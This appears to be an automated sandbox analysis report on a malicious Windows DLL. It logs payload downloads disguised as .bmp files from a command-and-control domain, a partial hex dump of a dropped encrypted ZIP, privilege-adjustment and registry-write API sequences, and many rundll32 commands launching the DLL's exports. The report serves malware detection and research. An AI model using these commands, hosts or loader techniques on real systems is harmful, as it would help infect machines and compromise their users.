Windows Analysis Report
0Gs0WEGB1E.dll

Drops password protected ZIP file

Source: global traffic	HTTP traffic detected: GET /2/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /2/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /2/t1.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /2/t6.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 05:22:11 GMTContent-Type: image/x-ms-bmpContent-Length: 231953Connection: keep-aliveLast-Modified: Wed, 23 Oct 2024 16:12:10 GMTETag: "6719205a-38a11"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 0Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A4k3nOfnwtLHAW7byKbv%2FDEHg%2FJ%2BEJ%2BcD3bC2FZEFC9GSTV5VZu4w0pKv98BwUfNgSja1ACfRYVGwMnoiB1GUYWzufAtJPxCHsB5zNzvYpjytsvWJ2bvNT5%2Bfl5FsCM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f86df15fe557d1e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4162&min_rtt=1971&rtt_var=5122&sent=3&recv=5&lost=0&retrans=0&sent_bytes=878&recv_bytes=231&delivery_rate=74864&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 50 4b 03 04 14 00 00 00 00 00 96 01 58 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 db 90 19 67 db 90 19 67 db 90 19 67 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 2c 20 19 67 2b 56 ec 66 35 4f c3 bc f1 a4 c9 bd bc 14 31 c4 75 15 bd d3 c2 29 19 ce 46 a8 0f 81 13 8a 36 76 a0 c2 69 4e 21 8d fd af 43 4d 7d 85 2f fe b7 d9 51 87 b4 70 3f cc fe df 07 83 b0 14 fb 19 76 09 f7 fd 17 5a cf 66 a2 68 ea fc 06 45 d9 8a fc 4b 22 55 b9 07 6b 4e 37 ca 74 20 84 7b f1 5a 03 94 5c 32 dc bb 83 8f db 28 72 e6 a5 5f ec 88 20 42 62 fd f2 54 09 93 bb 9e 0f 9d 99 3d 0d e5 f2 d4 c8 c2 d6 bb de a9 99 88 7d d1 da fb 78 82 3c b4 34 11 96 11 3d 77 ee a9 56 71 c3 c7 43 4e fe a2 03 14 94 ca dd 32 11 87 06 80 6b 76 93 80 bf 83 58 1d 72 37 60 b9 1d 0c b1 ca c8 da f5 33 92 a9 f9 e6 d9 ac 62 c8 11 ee 6b 1c 1d 72 e8 f1 b4 73 95 e8 7b 7b 90 aa 4f da 00 c3 3b 3c 86 5d 85 f0 Data Ascii: PKXYtext/UTgggPK7Xxtext/MSVCP140.dllUTe, g+Vf5O1u)F6viN!CM}/Qp?vZfhEK"UkN7t {Z\2(r_ BbT=}x<4=wVqCN2kvXr7`3bkrs{{O;<]

Source: global traffic	HTTP traffic detected: GET /2/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /2/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /2/t1.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global traffic	HTTP traffic detected: GET /2/t6.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com

Source: global traffic

DNS traffic detected: DNS query: ad59t82g.com

Source: rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1867581832.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/
Source: rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/13;LY
Source: rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/13LL6
Source: rundll32.exe, 0000000A.00000002.2083571808.0000000002DD7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/2/d.bmpbthttp://ad59t82g.com/2/t6.bmphttp://ad59t82g.com/2/text.bmpC:
Source: rundll32.exe, 0000000A.00000002.2083571808.0000000002DD7000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/2/t1.bmpC:
Source: rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/2/text.bmp
Source: rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/2/text.bmpHd
Source: rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/2/text.bmpMd
Source: rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/79
Source: rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/79;LY
Source: rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/LL6
Source: rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ad59t82g.com/f1
Source: rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.dr	String found in binary or memory: http://crl.wosign.com/WoSignCodeSigning.crl0G
Source: rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.dr	String found in binary or memory: http://crt.wosign.com/WoSignCodeSigning.crt0
Source: FileSystem_Stdio.dll.10.dr	String found in binary or memory: http://www.astro.com/swisseph.
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	String found in binary or memory: http://www.astrolog.org/astrolog.htm
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	String found in binary or memory: http://www.astrolog.org/astrolog.htmMain
Source: rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.dr	String found in binary or memory: http://www.dokee.cn
Source: FileSystem_Stdio.dll.10.dr	String found in binary or memory: http://www.gnu.org
Source: rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.dr	String found in binary or memory: http://www.wosign.com/cps/0
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	String found in binary or memory: https://data.iana.org/time-zones/tz-link.html
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	String found in binary or memory: https://data.iana.org/time-zones/tz-link.htmlPostScript
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	String found in binary or memory: https://www.geonames.org/
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.dr	String found in binary or memory: https://www.geonames.org/Timezone

System Summary

Source: t3d.tmp.10.dr	Zip Entry: encrypted
Source: t3d.tmp.10.dr	Zip Entry: encrypted
Source: t3d.tmp.10.dr	Zip Entry: encrypted

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E346A92	0_2_6E346A92
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E345B2D	0_2_6E345B2D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E337311	0_2_6E337311
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E344F00	0_2_6E344F00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E33886F	0_2_6E33886F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E345451	0_2_6E345451
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E336976	0_2_6E336976
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E336176	0_2_6E336176
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E3449AF	0_2_6E3449AF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E33BDE0	0_2_6E33BDE0

Source: 0Gs0WEGB1E.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal100.evad.winDLL@112/8@1/1

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E331772 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,	0_2_6E331772
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E3318A0 AdjustTokenPrivileges,	0_2_6E3318A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E3318EA LookupPrivilegeValueA,OpenProcess,OpenProcessToken,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLengthSid,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLengthSid,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLengthSid,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLengthSid,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,	0_2_6E3318EA

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E3317FE CreateToolhelp32Snapshot,_memset,Process32FirstW,lstrcmpiW,Process32NextW,CloseHandle,

0_2_6E3317FE

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E3332BD _memset,Sleep,_memset,Sleep,_memset,_memset,__time64,_memset,_rand,_rand,Sleep,Sleep,_memset,wsprintfA,_memset,Sleep,MakeSureDirectoryPathExists,Sleep,_memset,wsprintfA,Sleep,GetFileAttributesA,SetFileAttributesA,_memset,wsprintfA,_memset,Sleep,_memset,wsprintfA,_memset,Sleep,_memset,wsprintfA,_memset,Sleep,_memset,wsprintfA,_memset,Sleep,Sleep,Sleep,Sleep,__time64,_memset,_rand,_memset,wsprintfA,wsprintfA,_memset,wsprintfA,Sleep,Sleep,Sleep,_memset,_mbstowcs,_memset,_memset,_strcat_s,FindWindowExA,Sleep,SysAllocString,SysAllocString,SysAllocString,Sleep,GlobalAddAtomA,FindWindowA,FindWindowA,PostMessageA,PostMessageA,PostMessageA,FindWindowA,PostMessageA,_memset,_memset,_memset,_memset,_mbstowcs,_memset,_memset,_memset,_strcat_s,FindWindowExA,Sleep,CoInitializeEx,CoCreateInstance,CoUninitialize,_memset,LoadLibraryA,_memset,GetProcAddress,_memset,Sleep,Sleep,Sleep,Sleep,Sleep,_memset,LoadLibraryA,_memset,GetProcAddress,_memset,_memset,wsprintfA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,

0_2_6E3332BD

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Program Files (x86)\mRiZvH

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03

Source: 0Gs0WEGB1E.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelist

Source: 0Gs0WEGB1E.dll	Virustotal: Detection: 42%
Source: 0Gs0WEGB1E.dll	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_scheme_handler_factories
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_command_line_create
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_cross_origin_whitelist
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_scheme_handler_factories
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_command_line_create
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",you
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",create_context_shared
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_reader_create
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_directory
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_write_json
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_window_create_top_level
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_visit_web_plugin_info
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_value_create
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_undefined
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_uint
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_string
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_object
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_null
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_int
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_function
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_double
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_date
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_bool
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array_buffer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8stack_trace_get_current
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_in_context
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_entered_context
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_current_context
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_urlrequest_create
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uriencode
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uridecode
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_unregister_internal_web_plugin
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_to_timet
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_now
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_delta
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelist	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_scheme_handler_factories	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_command_line_create	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_cross_origin_whitelist	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_scheme_handler_factories	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_command_line_create	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",you	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",create_context_shared	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_reader_create	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_directory	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_write_json	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_window_create_top_level	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_visit_web_plugin_info	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_value_create	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_undefined	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_uint	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_string	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_object	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_null	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_int	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_function	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_double	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_date	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_bool	Jump to behavior
